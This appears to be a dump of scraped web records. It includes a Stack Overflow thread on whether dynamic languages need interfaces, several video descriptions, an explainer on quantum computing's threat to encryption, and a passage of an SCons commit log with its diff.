content
stringlengths
228
999k
pred_label
stringclasses
1 value
pred_score
float64
0.5
1
Tell me more × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. In static languages like Java you need interfaces because otherwise the type system just won't let you do certain things. But in dynamic languages like PHP and Python you just take advantage of duck-typing. PHP supports interfaces. Ruby and Python don't have them. So you can clearly live happily without them. I've been mostly doing my work in PHP and have never really made use of the ability to define interfaces. When I need a set of classes to implement certain common interface, then I just describe it in documentation. So, what do you think? Aren't you better off without using interfaces in dynamic languages at all? share|improve this question add comment 17 Answers I think of it more as a level of convenience. If you have a function which takes a "file-like" object and only calls a read() method on it, then it's inconvenient - even limiting - to force the user to implement some sort of File interface. It's just as easy to check if the object has a read method. But if your function expects a large set of methods, it's easier to check if the object supports an interface then to check for support of each individual method. share|improve this answer add comment Yes, there is a point If you don't explicitly use interfaces your code still uses the object as though it implemented certain methods it's just unclear what the unspoken interface is. If you define a function to accept an interface (in PHP say) then it'll fail earlier, and the problem will be with the caller not with the method doing the work. Generally failing earlier is a good rule of thumb to follow. share|improve this answer add comment Interfaces actually add some degree of dynamic lang-like flexibility to static languages that have them, like Java. They offer a way to query an object for which contracts it implements at runtime. That concept ports well into dynamic languages. Depending on your definition of the word "dynamic", of course, that even includes Objective-C, which makes use of Protocols pretty extensively in Cocoa. In Ruby you can ask whether an object responds to a given method name. But that's a pretty weak guarantee that it's going to do what you want, especially given how few words get used over and over, that the full method signature isn't taken into account, etc. In Ruby I might ask object.respond_to? :sync So, yeah, it has a method named "sync", whatever that means. In Objective-C I might ask something similar, i.e. "does this look/walk/quack like something that synchronizes?": [myObject respondsToSelector:@selector(sync)] Even better, at the cost of some verbosity, I can ask something more specific, i.e. "does this look/walk/quack like something that synchronizes to MobileMe?": [myObject respondsToSelector:@selector(sync:withMobileMeAccount:)] That's duck typing down to the species level. But to really ask an object whether it is promising to implement synchronization to MobileMe... [receiver conformsToProtocol:@protocol(MobileMeSynchronization)] Of course, you could implement protocols by just checking for the presence of a series of selectors that you consider the definition of a protocol/duck, and if they are specific enough. At which point the protocol is just an abbreviation for a big hunk of ugly responds_to? queries, and some very useful syntactic sugar for the compiler/IDE to use. Interfaces/protocols are another dimension of object metadata that can be used to implement dynamic behavior in the handling of those objects. In Java the compiler just happens to demand that sort of thing for normal method invocation. But even dynamic languages like Ruby, Python, Perl, etc. implement a notion of type that goes beyond just "what methods an object responds to". Hence the class keyword. Javascript is the only really commonly used language without that concept. If you've got classes, then interfaces make sense, too. It's admittedly more useful for more complicated libraries or class hierarchies than in most application code, but I think the concept is useful in any language. Also, somebody else mentioned mixins. Ruby mixins are a way to share code -- e.g., they relate to the implementation of a class. Interfaces/protocols are about the interface of a class or object. They can actually complement each other. You might have an interface which specifies a behavior, and one or more mixins which help an object to implement that behavior. Of course, I can't think of any languages which really have both as distinct first-class language features. In those with mixins, including the mixin usually implies the interface it implements. share|improve this answer add comment If you do not have hight security constraints (so nobody will access you data a way you don't want to) and you have a good documentation or well trained coders (so they don't need the interpreter / compiler to tell them what to do), then no, it's useless. For most medium size projects, duck typing is all you need. share|improve this answer add comment I think use of interfaces is determined more by how many people will be using your library. If it's just you, or a small team then documentation and convention will be fine and requiring interfaces will be an impediment. If it's a public library then interfaces are much more useful because they constrain people to provide the right methods rather than just hint. So interfaces are definitely a valuable feature for writing public libraries and I suppose that lack (or at least de-emphasis) is one of the many reasons why dynamic languages are used more for apps and strongly-typed languages are used for big libraries. share|improve this answer add comment I was under the impression that Python doesn't have interfaces. As far as I'm aware in Python you can't enforce a method to be implemented at compilation time precisely because it is a dynamic language. There are interface libraries for Python but I haven't used any of them. Python also has Mixins so you could have create an Interface class by defining a Mixin an having pass for every method implementation but that's not really giving you much value. share|improve this answer   Thanks for pointing this out, I did a web search before, found an article that discussed intefaces in Python and concluded that Python must have interfaces - actually the article discussed the question of adding interfaces to python. –  Rene Saarsoo Sep 18 '08 at 11:21 add comment Rene, please read my answer to "Best Practices for Architecting Large Systems in a Dynamic Language" question here on StackOverflow. I discuss some benefits of giving away the freedom of dynamic languages to save development effort and to ease introducing new programmers to the project. Interfaces, when used properly, greatly contribute to writing reliable software. share|improve this answer add comment Python 3000 will have Abstract Base Classes. Well worth a read. share|improve this answer add comment One use of the Java "interface" is to allow strongly-typed mixins in Java. You mix the proper superclass, plus any additional methods implemented to support the interface. Python has multiple inheritance, so it doesn't really need the interface contrivance to allow methods from multiple superclasses. I, however, like some of the benefits of strong typing -- primarily, I'm a fan of early error detection. I try to use an "interface-like" abstract superclass definition. class InterfaceLikeThing( object ): def __init__( self, arg ): self.attr= None self.otherAttr= arg def aMethod( self ): raise NotImplementedError def anotherMethod( self ): return NotImplemented This formalizes the interface -- in a way. It doesn't provide absolute evidence for a subclass matching the expectations. However, if a subclass fails to implement a required method, my unit tests will fail with an obvious NotImplemented return value or NotImplementedError exception. share|improve this answer   Have you ever used the interface libraries in Plone or Trac? Trac in particular is a very approachable codebase and makes use of interfaces in its plugin architecture. The code might do things like querying for all IMainMenuItem implementations to populate the main menu. –  joeforker Feb 4 '09 at 18:17   +1 for supplying to the lack of type checks with unit tests! –  Paolo Tedesco Mar 27 '09 at 8:40 add comment In a language like PHP where a method call that doesn't exist results in a fatal error and takes the whole application down, then yes interfaces make sense. In a language like Python where you can catch and handle invalid method calls, it doesn't. share|improve this answer add comment Well, first of all, it's right that Ruby does not have Interface as is, but they have mixin, wich takes somehow the best of both interfaces and abstract classes from other languages. The main goal of interface is to ensure that your object SHALL implement ALL the methods present in the interface itself. Of course, interface are never mandatory, even in Java you could imagine to work only with classes and using reflection to call methods when you don't know wich kind of object you're manipulating, but it is error prone and should be discouraged in many ways. share|improve this answer add comment Well, it would certainly be easier to check if a given object supported an entire interface, instead of just not crashing when you call the one or two methods you use in the initial method, for instance to add an object to an internal list. Duck typing has some of the benefits of interfaces, that is, easy of use everywhere, but the detection mechanism is still missing. share|improve this answer add comment It's like saying you don't need explicit types in a dynamically-typed language. Why don't you make everything a "var" and document their types elsewhere? It's a restriction imposed on a programmer, by a programmer. It makes it harder for you to shoot yourself in the foot; gives you less room for error. share|improve this answer add comment as a PHP programmer, the way I see it, an Interface is basically used as a contract. It lets you say that everything which uses this interface MUST implement a given set of functions. I dunno if that's all that useful, but I found it a bit of a stumbling block when trying to understand what Interfaces were all about. share|improve this answer add comment If you felt you had to, you could implement a kind of interface with a function that compares an object's methods/attributes to a given signature. Here's a very basic example: file_interface = ('read', 'readline', 'seek') class InterfaceException(Exception): pass def implements_interface(obj, interface): d = dir(obj) for item in interface: if item not in d: raise InterfaceException("%s not implemented." % item) return True >>> import StringIO >>> s = StringIO.StringIO() >>> implements_interface(s, file_interface) True >>> >>> fp = open('/tmp/123456.temp', 'a') >>> implements_interface(fp, file_interface) True >>> fp.close() >>> >>> d = {} >>> implements_interface(d, file_interface) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "<stdin>", line 4, in implements_interface __main__.InterfaceException: read not implemented. Of course, that doesn't guarantee very much. share|improve this answer add comment In addition to the other answers I just want to point out that Javascript has an instanceof keyword that will return true if the given instance is anywhere in a given object's prototype chain. This means that if you use your "interface object" in the prototype chain for your "implementation objects" (both are just plain objects to JS) then you can use instanceof to determine if it "implements" it. This does not help the enforcement aspect, but it does help in the polymorphism aspect - which is one common use for interfaces. MDN instanceof Reference share|improve this answer add comment Stop trying to write Java in a dynamic language. share|improve this answer 1   Well, I asked this question because I thought that Interfaces in PHP were kind of Java-ish... and I really dislike Java... haven't used it for years. –  Rene Saarsoo Apr 5 '09 at 21:28 add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.621342
This Man-Eating Crocodile Eats Man Alive While Kayaking! Hendri Coetzee was an avid explorer from South Africa who was tragically eaten alive by a man-eating crocodile while kayaking in the Congo. This video contains graphic descriptions of animal attacks and may include dramatic re-enactments of the attack. Viewer discretion is advised. DISCLAIMER: The pictures, audio, and video used in the videos on this channel are a mix of paid stock, by attribution, royalty-free, public domain, and other copyright-free sources. No copyright infringement is intended. All rights belong to their respective owners. If you are or represent the copyright owner of materials used in this video and have an issue with the use of said material, please send an email to [email protected] I will respond immediately. @FinalAffliction The CAR WIZARD shares 6 Super Reliable vehicles under $10K! The CAR WIZARD 🧙‍♂️ presents a new BTNT in his on going series, this video shares SIX super reliable cars, trucks or SUV's priced under $10,000. Please remember these recommendations are based on his experiences with these cars as a mechanic and the services he has found they do or do not require. 🔮🔧 AMAZON AFFILIATE STORE: https://www.amazon.com/shop/omegaauto... 🔧🔮 🇬🇧🇬🇧 UK AMAZON STORE: https://www.amazon.co.uk/shop/omegaau... 🇬🇧🇬🇧 🧰 BENDPAK LIFTS: https://www.bendpak.com 🧰 1:40 00-05 LeSabre 3:50 99-06 Silverado or Sierra 6:50 04-09 RX330/350 8:45 98-12 Crown Vic 11:00 96-00 LS400 13:00 01-07 Highlander How Quantum Computers Break The Internet... Starting Now Quantum Computers and the Future of Encryption: Challenges and Solutions Encryption has become a crucial aspect of our modern digital world. It allows us to securely transmit and store sensitive information, such as financial data, medical records, and personal communications. However, recent advancements in quantum computing have raised concerns about the security of our current encryption methods. In this article, we will explore the possibility of quantum computers breaking current levels of encryption and discuss some possible solutions to this problem. The Rise of Quantum Computing Quantum computing is a new technology that uses quantum mechanics to perform complex calculations at a speed that is significantly faster than classical computing. This is because quantum computers utilize qubits, which can exist in multiple states simultaneously, allowing them to perform many calculations at once. This makes quantum computers particularly effective at solving problems that are too complex for classical computers to handle. The potential applications of quantum computing are vast, ranging from drug discovery to weather forecasting. However, quantum computing also poses a threat to our current encryption methods. This is because many encryption algorithms rely on the difficulty of factoring large numbers, a problem that can be solved quickly by a quantum computer using Shor's algorithm. The Threat to Encryption Our current encryption methods, such as RSA and elliptic curve cryptography, are based on mathematical problems that are difficult for classical computers to solve. For example, RSA encryption relies on the difficulty of factoring the product of two large prime numbers. However, these problems can be solved quickly by a quantum computer using Shor's algorithm. This means that a quantum computer could potentially break current encryption methods, exposing sensitive information to malicious actors. This is particularly concerning for industries that rely on encryption, such as finance, healthcare, and government. Possible Solutions Despite the threat that quantum computing poses to encryption, there are possible solutions to this problem. One solution is to develop new encryption methods that are resistant to quantum attacks. This includes post-quantum cryptography, which uses mathematical problems that are believed to be difficult for both classical and quantum computers to solve. Another solution is to implement quantum key distribution (QKD), which uses the principles of quantum mechanics to securely distribute encryption keys. This method relies on the fact that any attempt to intercept a quantum signal will disturb it, making it impossible to eavesdrop without being detected. Finally, some experts suggest that a hybrid approach, using both classical and quantum computing, could be a viable solution. This approach would utilize the strengths of both types of computers to create a more secure encryption system. Conclusion Quantum computing has the potential to revolutionize many industries, but it also poses a threat to our current encryption methods. As quantum computing continues to develop, it is important to explore new encryption methods and solutions to ensure that our sensitive information remains secure. Whether it is post-quantum cryptography, QKD, or a hybrid approach, the key is to stay ahead of the threat and be prepared for the future of computing. Sources:
__label__pos
0.933812
Commits Anonymous committed 6661c9e Merged revisions 1968-2115 via svnmerge from http://scons.tigris.org/svn/scons/branches/core ........ r1970 | stevenknight | 2007-06-01 18:22:37 -0500 (Fri, 01 Jun 2007) | 4 lines Import a vanilla Python 2.3 version of textwrap.py into the compatibility library, so we can track the changes we'll make to it. (This isn't actually used yet.) ........ r1971 | stevenknight | 2007-06-02 00:38:20 -0500 (Sat, 02 Jun 2007) | 2 lines Add a compatibility module for the textwrap.py module introduced in Python 2.3. ........ r1972 | stevenknight | 2007-06-02 00:39:26 -0500 (Sat, 02 Jun 2007) | 2 lines Remove spurious <para> tags. ........ r1973 | stevenknight | 2007-06-03 08:57:05 -0500 (Sun, 03 Jun 2007) | 2 lines Improved help-text generation using a textwrap.TextWrapper object. ........ r1991 | stevenknight | 2007-06-10 16:03:18 -0500 (Sun, 10 Jun 2007) | 3 lines Add compatibility versions of the all() and any() functions introduced in Python 2.5. ........ r1992 | stevenknight | 2007-06-10 17:02:18 -0500 (Sun, 10 Jun 2007) | 8 lines SCons-time portability fixes for Python 2.[12]: -- Use "from __future__ import nested_scopes". -- Create "False" and "True" builtins -- Work around the lack of a "prefix =" keyword argument to the Python 2.[12] version of the mktemp module. -- Accomodate pickier single-element tuple syntax. ........ r1993 | stevenknight | 2007-06-10 17:27:43 -0500 (Sun, 10 Jun 2007) | 3 lines Delay instantiation of pstat.Stats objects until after we override sys.stdout, which as of Python 2.5 is captured when the object is created. ........ r1994 | stevenknight | 2007-06-10 21:22:42 -0500 (Sun, 10 Jun 2007) | 6 lines Update various tests to handle the File "SConstruct", line 1, in <module> Messages in Python 2.5. ........ r1995 | stevenknight | 2007-06-10 21:32:16 -0500 (Sun, 10 Jun 2007) | 3 lines Update tests to not raise strings as exceptions, which has been deprecated in Python 2.5. ........ r1996 | stevenknight | 2007-06-10 21:41:57 -0500 (Sun, 10 Jun 2007) | 3 lines Fix the Scanner hash unit test for Python 2.5. (Yes, it still works on previous versions, too.) ........ r1997 | stevenknight | 2007-06-10 21:55:46 -0500 (Sun, 10 Jun 2007) | 3 lines Make the mock Node object's side_effect attribute a list, so it's iterable in Python 2.1 as well. ........ r1998 | stevenknight | 2007-06-10 22:04:26 -0500 (Sun, 10 Jun 2007) | 3 lines Append an explicit tuple to the delayed_warnings list if there are problems interpreting --debug=memoizer. ........ r1999 | stevenknight | 2007-06-11 11:09:07 -0500 (Mon, 11 Jun 2007) | 2 lines Fix --debug=time with -j when no arguments are rebuilt (all up-to-date). ........ r2007 | stevenknight | 2007-06-14 13:56:35 -0500 (Thu, 14 Jun 2007) | 4 lines Performance improvement when looking up Nodes: don't use is_String(), just check for the initial '#' that specifies a top-relative lookup, and handle the exceptions. ........ r2008 | stevenknight | 2007-06-14 16:57:47 -0500 (Thu, 14 Jun 2007) | 11 lines First step in refactoring command-line flag processing: Split out the current processing into its own module, with minimal additional changes. Among the minimal changes: -- Store delayed warnings (for deprecated --debug= keywords) in the option parser object, not in a global variable. -- Remove the OptParser variable itself from the SCons.Script globals. It's going to change significantly (and no one's probably using it anyway). -- Don't move definition of the --version output with the OptParser, keep it in Main.py. ........ r2009 | stevenknight | 2007-06-15 08:15:25 -0500 (Fri, 15 Jun 2007) | 3 lines Refactor the test/explain.py script into three individual scripts so it's easier to deal with. ........ r2010 | stevenknight | 2007-06-15 09:49:07 -0500 (Fri, 15 Jun 2007) | 3 lines Handle Aliases in --debug=explain. This is kind of hard-coded for the normal lookup, and should be better handled by the signature refactoring. ........ r2011 | stevenknight | 2007-06-15 17:25:37 -0500 (Fri, 15 Jun 2007) | 5 lines Refactor use of the command-line parser object so it's localized to the top-level main() function, and not passed down through _exec_main() or to _main() itself. Replace its functionality with use of an exception to signal that the top-level main() function should print its help message. ........ r2012 | stevenknight | 2007-06-17 23:34:26 -0500 (Sun, 17 Jun 2007) | 2 lines Remove unnecessary import of __main__. ........ r2013 | stevenknight | 2007-06-17 23:48:06 -0500 (Sun, 17 Jun 2007) | 2 lines Pass the options object to _main(), don't use a global. ........ r2014 | stevenknight | 2007-06-18 00:12:09 -0500 (Mon, 18 Jun 2007) | 6 lines Qt test fixes for Windows: Link against a static library created by the test infrastructure, not a shared library. Escape backslashes in Windows path names. Skip test/QT/Tool.py if Qt isn't installed. ........ r2015 | stevenknight | 2007-06-18 10:46:17 -0500 (Mon, 18 Jun 2007) | 3 lines Support GetOption('no_exec'), and update test/NodeOps.py to use it instead of reaching into the SCons.Script.Main internals. ........ r2016 | stevenknight | 2007-06-18 11:04:39 -0500 (Mon, 18 Jun 2007) | 4 lines Restore use of a global delayed_warnings variable so the chicken-and-egg warning from trying to use --debug=memoizer on Python versions without metaclasses has somewhere to go. ........ r2017 | stevenknight | 2007-06-18 11:37:59 -0500 (Mon, 18 Jun 2007) | 3 lines Have the test infrastructure create a mock Qt shared library on UNIX, static library on Windows. ........ r2018 | stevenknight | 2007-06-18 11:48:10 -0500 (Mon, 18 Jun 2007) | 2 lines Pull more globals into the command-line parser options object. ........ r2023 | stevenknight | 2007-06-19 16:46:02 -0500 (Tue, 19 Jun 2007) | 3 lines Refactor the __checkClass() and must_be_a_Dir() methods into a more general and more efficient must_be_same() method. ........ r2025 | stevenknight | 2007-06-19 20:56:10 -0500 (Tue, 19 Jun 2007) | 3 lines More clean up: change various self.fs.Entry() calls to calls through the bound directory.Entry() method. ........ r2033 | stevenknight | 2007-06-20 20:03:23 -0500 (Wed, 20 Jun 2007) | 5 lines The --debug=count option doesn't work when run with Python - O, or from optimized compiled Python modules (*.pyo files), because the counting is all within "#if __debug__:" blocks that get stripped. Print a warning so it doesn't look like --debug=count is broken. ........ r2037 | stevenknight | 2007-06-21 10:42:40 -0500 (Thu, 21 Jun 2007) | 3 lines Replace the _stripixes() function with a more efficient/readable version that was checked in, but commented out, prior to 0.96.96. ........ r2040 | stevenknight | 2007-06-21 12:18:57 -0500 (Thu, 21 Jun 2007) | 2 lines Ignore *.pyo files, too, since one of the tests now generates them. ........ r2051 | stevenknight | 2007-06-26 15:11:57 -0500 (Tue, 26 Jun 2007) | 5 lines Arrange for graceful shutdown of the worker threads by writing None to the requestQueue and having the worker threads terminate their processing loops when they read it. We can then .join() the threads, to wait for their termination, avoiding exceptions in the threading library module. ........ r2052 | stevenknight | 2007-06-26 15:12:53 -0500 (Tue, 26 Jun 2007) | 3 lines Have the SWIG tests that use the Python.h header skip gracefully if the Python development environment isn't installed. ........ r2053 | stevenknight | 2007-06-26 15:23:55 -0500 (Tue, 26 Jun 2007) | 3 lines Massage the datestamp and IDs in the generated PDF so we can compare before-and-after output reliably regardless of when generated. ........ r2054 | stevenknight | 2007-06-26 15:25:56 -0500 (Tue, 26 Jun 2007) | 3 lines Fix the regular expression that matches the Qt warning message when the moc executable is used as a hint. ........ r2055 | stevenknight | 2007-06-26 15:48:21 -0500 (Tue, 26 Jun 2007) | 2 lines Fix 2.5.1 string exception warnings. ........ r2056 | stevenknight | 2007-06-26 19:23:22 -0500 (Tue, 26 Jun 2007) | 2 lines Skip the scons-time tests if the Python version can't import __future__. ........ r2057 | stevenknight | 2007-06-26 22:11:04 -0500 (Tue, 26 Jun 2007) | 3 lines Normalize PDF output in the bibtex rerun test as well. Commonize the PDF normalization logic by putting it in QMTest/TestSCons.py. ........ r2058 | stevenknight | 2007-06-26 22:50:39 -0500 (Tue, 26 Jun 2007) | 3 lines Duplicate a function declaration to suppress compiler warnings about a cast, when using certain systems/compilers. ........ r2059 | stevenknight | 2007-06-26 22:53:12 -0500 (Tue, 26 Jun 2007) | 2 lines Use the frtbegin when compiling Fortran programs using GCC 4. ........ r2060 | stevenknight | 2007-06-26 23:13:35 -0500 (Tue, 26 Jun 2007) | 2 lines Make the object that goes into the shared library a shared object file. ........ r2061 | stevenknight | 2007-06-26 23:53:49 -0500 (Tue, 26 Jun 2007) | 4 lines Split test/AS/AS.py into sub-tests for the live assemblers it tests. Only test nasm for the known configuration of version 0.98* on a 32-bit x86 system. ........ r2063 | stevenknight | 2007-06-27 09:51:43 -0500 (Wed, 27 Jun 2007) | 2 lines Fix searching for the rmic utility. ........ r2064 | stevenknight | 2007-06-27 10:26:42 -0500 (Wed, 27 Jun 2007) | 3 lines Improved worker-thread termination in a separate Job.cleanup() method. (Adam Simpkins) ........ r2087 | stevenknight | 2007-07-03 12:22:10 -0500 (Tue, 03 Jul 2007) | 7 lines Get rid of unnecessary subclassing and complicating overriding of __init__() and parse_args() methods in favor of more straightforward initialization of the OptionParser object. We may need to restore subclassing in the future, but if so we'll do it in a more OO way. ........ r2088 | stevenknight | 2007-07-03 16:12:30 -0500 (Tue, 03 Jul 2007) | 2 lines Fix a cleanup error (no self.p4d attribute) when Perforce isn't installed. ........ r2090 | stevenknight | 2007-07-04 03:23:57 -0500 (Wed, 04 Jul 2007) | 2 lines Import the vanilla Python 2.5 optparse.py for use as a compatibility module. ........ r2091 | stevenknight | 2007-07-04 03:35:17 -0500 (Wed, 04 Jul 2007) | 5 lines Use the new optparse compatibility module for command-line processing, and remove the SCons/Optik/*.py modules, with appropriate subclassing in Script/SConsOptions.py to preserve the way we print help text and SCons error messages. ........ r2108 | stevenknight | 2007-07-08 22:57:08 -0500 (Sun, 08 Jul 2007) | 3 lines Make all of the optparse.add_options calls more-or-less consistent in how they call the keyword arguments. ........ r2109 | stevenknight | 2007-07-09 12:31:01 -0500 (Mon, 09 Jul 2007) | 6 lines Consolidate command-line and {Get,Set}Option() processing and access in a single subclass of the optparse.Values() class. Allow all options, not just those that aren't SConscript-settable, to set their default values when calling op.add_option(). ........ r2110 | stevenknight | 2007-07-09 13:17:58 -0500 (Mon, 09 Jul 2007) | 4 lines Handle initialization of command-line repository options by passing the option arguments directly to the _SConstruct_exists() utility function, not by setting a global variable. ........ r2111 | stevenknight | 2007-07-09 13:42:41 -0500 (Mon, 09 Jul 2007) | 2 lines Remove the unused _varargs() utility function. ........ r2112 | stevenknight | 2007-07-09 15:21:51 -0500 (Mon, 09 Jul 2007) | 2 lines Clean up how we use optparse (mainly for readability). ........ r2113 | stevenknight | 2007-07-10 15:50:08 -0500 (Tue, 10 Jul 2007) | 2 lines More old-Python-version compatibility changes in optparse.py. ........ r2114 | stevenknight | 2007-07-10 16:46:42 -0500 (Tue, 10 Jul 2007) | 3 lines Add support for a new AddOption() function to allow the SConscript file(s) to define new command-line flags. ........ • Participants • Parent commits e4b07e2 Comments (0) Files changed (72) File QMTest/TestSCons.py for l in stderr.readlines(): list = string.split(l) if len(list) > 3 and list[:2] == ['gcc', 'version']: - if list[2][:2] == '3.': + if list[2][:2] in ('3.', '4.'): libs = ['frtbegin'] + libs break return libs # we call test.no_result(). self.no_result(skip=1) - def diff_substr(self, expect, actual): + def diff_substr(self, expect, actual, prelen=20, postlen=40): i = 0 for x, y in zip(expect, actual): if x != y: return "Actual did not match expect at char %d:\n" \ " Expect: %s\n" \ " Actual: %s\n" \ - % (i, repr(expect[i-20:i+40]), repr(actual[i-20:i+40])) + % (i, repr(expect[i-prelen:i+postlen]), + repr(actual[i-prelen:i+postlen])) i = i + 1 return "Actual matched the expected output???" x = string.replace(x, 'line 1,', 'line %s,' % line) return x + def normalize_pdf(self, s): + s = re.sub(r'/CreationDate \(D:[^)]*\)', + r'/CreationDate (D:XXXX)', s) + s = re.sub(r'/ID \[<[0-9a-fA-F]*> <[0-9a-fA-F]*>\]', + r'/ID [<XXXX> <XXXX>]', s) + return s + def java_ENV(self): """ Return a default external environment that uses a local Java SDK else: opt_string = opt_string + ' ' + opt for a in args: contents = open(a, 'rb').read() + a = string.replace(a, '\\\\', '\\\\\\\\') subst = r'{ my_qt_symbol( "' + a + '\\\\n" ); }' if impl: contents = re.sub( r'#include.*', '', contents ) self.write([dir, 'lib', 'SConstruct'], r""" env = Environment() -env.SharedLibrary( 'myqt', 'my_qobject.cpp' ) +import sys +if sys.platform == 'win32': + env.StaticLibrary( 'myqt', 'my_qobject.cpp' ) +else: + env.SharedLibrary( 'myqt', 'my_qobject.cpp' ) """) self.run(chdir = self.workpath(dir, 'lib'), File QMTest/TestSCons_time.py apply(TestCommon.__init__, [self], kw) + # Now that the testing object has been set up, check if we should + # skip the test due to the Python version. We need to be able to + # import __future__ (which scons-time.py uses for nested scopes) + # and to handle list comprehensions (just because we're avoiding + # the old map() and filter() idioms). + + try: + import __future__ + except ImportError: + version = string.split(sys.version)[0] + msg = 'scons-time does not work on Python version %s\n' % version + self.skip_test(msg) + try: eval('[x for x in [1, 2]]') except SyntaxError: File doc/man/scons.1 of the various classes used internally by SCons before and after reading the SConscript files and before and after building targets. -This only works when run under Python 2.1 or later. +This is not supported when run under Python versions earlier than 2.1, +when SCons is executed with the Python +.B -O +(optimized) option, +or when the SCons modules +have been compiled with optimization +(that is, when executing from +.B *.pyo +files). .TP --debug=dtree .EE '\""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +.TP +.RI AddOption( arguments ) +This function adds a new command-line option to be recognized. +The specified +.I arguments +are the same as supported by the standard Python +.B optparse.add_option +method; +see the documentation for +.B optparse +for a thorough discussion of its option-processing capabities. +(Note that although the +.B optparse +module was not a standard module until Python 2.3, +.B scons +contains a compatible version of the module +that is used to provide identical functionality +when run by earlier Python versions.) + +If no +.B default= +keyword argument is supplied when calling +.BR AddOption (), +the option will have a default value of +.BR None . + +Once a new command-line option has been added with +.BR AddOption (), +the option value may be accessed using +.BR GetOption () +or +.BR env.GetOption (). +The value may also be set, using +.BR SetOption () +or +.BR env.SetOption (), +if conditions in a +.B SConscript +require overriding any default value. +Note, however, that a +value specified on the command line will +.I always +override a value set by any SConscript file. + +Any specified +.B help= +strings for the new option(s) +will be displayed by the +.B -H +or +.B -h +options +(the latter only if no other help text is +specified in the SConscript files). +The help text for the local options specified by +.BR AddOption () +will appear below the SCons options themselves, +under a separate +.B "Local Options" +heading. +The options will appear in the help text +in the order in which the +.BR AddOption () +calls occur. + +Example: + +.ES +AddOption('--prefix', + dest='prefix', + nargs=1, type='string', + action='store', + metavar='DIR', + help='installation prefix') +env = Environment(PREFIX = GetOption('prefix')) +.EE + +'\""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" .TP .RI AddPostAction( target ", " action ) .TP which corresponds to --implicit-cache; .B max_drift which corresponds to --max-drift; +.B no_exec +which corresponds to -n, --no-exec, --just-print, --dry-run and --recon; .B num_jobs which corresponds to -j and --jobs. .B random File doc/user/libraries.in </para> - <para> - <scons_example name="objects" printme="1"> <file name="SConstruct" printme="1"> Library('foo', ['f1.c', 'f2.o', 'f3.c', 'f4.o']) File doc/user/libraries.sgml </para> - <para> - <programlisting> Library('foo', ['f1.c', 'f2.o', 'f3.c', 'f4.o']) </programlisting> File src/CHANGES.txt - Support {Get,Set}Option('random') so random-dependency interaction with CacheDir() is controllable from SConscript files. + - Add a new AddOption() function to support user-defined command- + line flags (like --prefix=, --force, etc.). + - Push and retrieve built symlinks to/from a CacheDir() as actual symlinks, not by copying the file contents. for adding a new method, respectively, to a construction environment or an arbitrary object (such as a class). + - Fix the --debug=time option when the -j option is specified and all + files are up to date. + From Leanid Nazdrynau: - When applying Tool modules after a construction environment has - Find Java anonymous classes when the next token after the name is an open parenthesis. + From Adam Simpkins: + + - Allow worker threads to terminate gracefully when all jobs are + finished. + From Sohail Somani: - Add LaTeX scanner support for finding dependencies specified with File src/engine/MANIFEST.in SCons/Action.py SCons/Builder.py SCons/compat/__init__.py +SCons/compat/_scons_optparse.py SCons/compat/_scons_sets.py SCons/compat/_scons_sets15.py SCons/compat/_scons_subprocess.py +SCons/compat/_scons_textwrap.py SCons/compat/_scons_UserString.py SCons/compat/builtins.py SCons/Conftest.py SCons/Node/Alias.py SCons/Node/FS.py SCons/Node/Python.py -SCons/Optik/__init__.py -SCons/Optik/errors.py -SCons/Optik/option.py -SCons/Optik/option_parser.py SCons/Options/__init__.py SCons/Options/BoolOption.py SCons/Options/EnumOption.py SCons/SConsign.py SCons/Script/Main.py SCons/Script/SConscript.py +SCons/Script/SConsOptions.py SCons/Script/__init__.py SCons/Sig/__init__.py SCons/Sig/MD5.py File src/engine/SCons/Defaults.py return result def _stripixes(prefix, list, suffix, stripprefix, stripsuffix, env, c=None): - """This is a wrapper around _concat() that checks for the existence - of prefixes or suffixes on list elements and strips them where it - finds them. This is used by tools (like the GNU linker) that need - to turn something like 'libfoo.a' into '-lfoo'.""" + """ + This is a wrapper around _concat()/_concat_ixes() that checks for the + existence of prefixes or suffixes on list elements and strips them + where it finds them. This is used by tools (like the GNU linker) + that need to turn something like 'libfoo.a' into '-lfoo'. + """ + if not list: + return list + if not callable(c): - if callable(env["_concat"]): - c = env["_concat"] + env_c = env['_concat'] + if env_c != _concat and callable(env_c): + # There's a custom _concat() method in the construction + # environment, and we've allowed people to set that in + # the past (see test/custom-concat.py), so preserve the + # backwards compatibility. + c = env_c else: - c = _concat - def f(list, sp=stripprefix, ss=stripsuffix): - result = [] - for l in list: - if isinstance(l, SCons.Node.FS.File): - result.append(l) - continue - if not SCons.Util.is_String(l): - l = str(l) - if l[:len(sp)] == sp: - l = l[len(sp):] - if l[-len(ss):] == ss: - l = l[:-len(ss)] - result.append(l) - return result - return c(prefix, list, suffix, env, f) + c = _concat_ixes + + if SCons.Util.is_List(list): + list = SCons.Util.flatten(list) -# This is an alternate _stripixes() function that passes all of our tests -# (as of 21 February 2007), like the current version above. It's more -# straightforward because it does its manipulation directly, not using -# the funky f call-back function to _concat(). (In this respect it's -# like the updated _defines() function below.) -# -# The most convoluted thing is that it still uses a custom _concat() -# function if one was placed in the construction environment; there's -# a specific test for that functionality, but it might be worth getting -# rid of. -# -# Since this work was done while trying to get 0.97 out the door -# (just prior to 0.96.96), I decided to be cautious and leave the old -# function as is, to minimize the chance of other corner-case regressions. -# The updated version is captured here so we can uncomment it and start -# using it at a less sensitive time in the development cycle (or when -# it's clearly required to fix something). -# -#def _stripixes(prefix, list, suffix, stripprefix, stripsuffix, env, c=None): -# """ -# This is a wrapper around _concat()/_concat_ixes() that checks for the -# existence of prefixes or suffixes on list elements and strips them -# where it finds them. This is used by tools (like the GNU linker) -# that need to turn something like 'libfoo.a' into '-lfoo'. -# """ -# -# if not list: -# return list -# -# if not callable(c): -# env_c = env['_concat'] -# if env_c != _concat and callable(env_c): -# # There's a custom _concat() method in the construction -# # environment, and we've allowed people to set that in -# # the past (see test/custom-concat.py), so preserve the -# # backwards compatibility. -# c = env_c -# else: -# c = _concat_ixes -# -# if SCons.Util.is_List(list): -# list = SCons.Util.flatten(list) -# -# lsp = len(stripprefix) -# lss = len(stripsuffix) -# stripped = [] -# for l in SCons.PathList.PathList(list).subst_path(env, None, None): -# if isinstance(l, SCons.Node.FS.File): -# stripped.append(l) -# continue -# if not 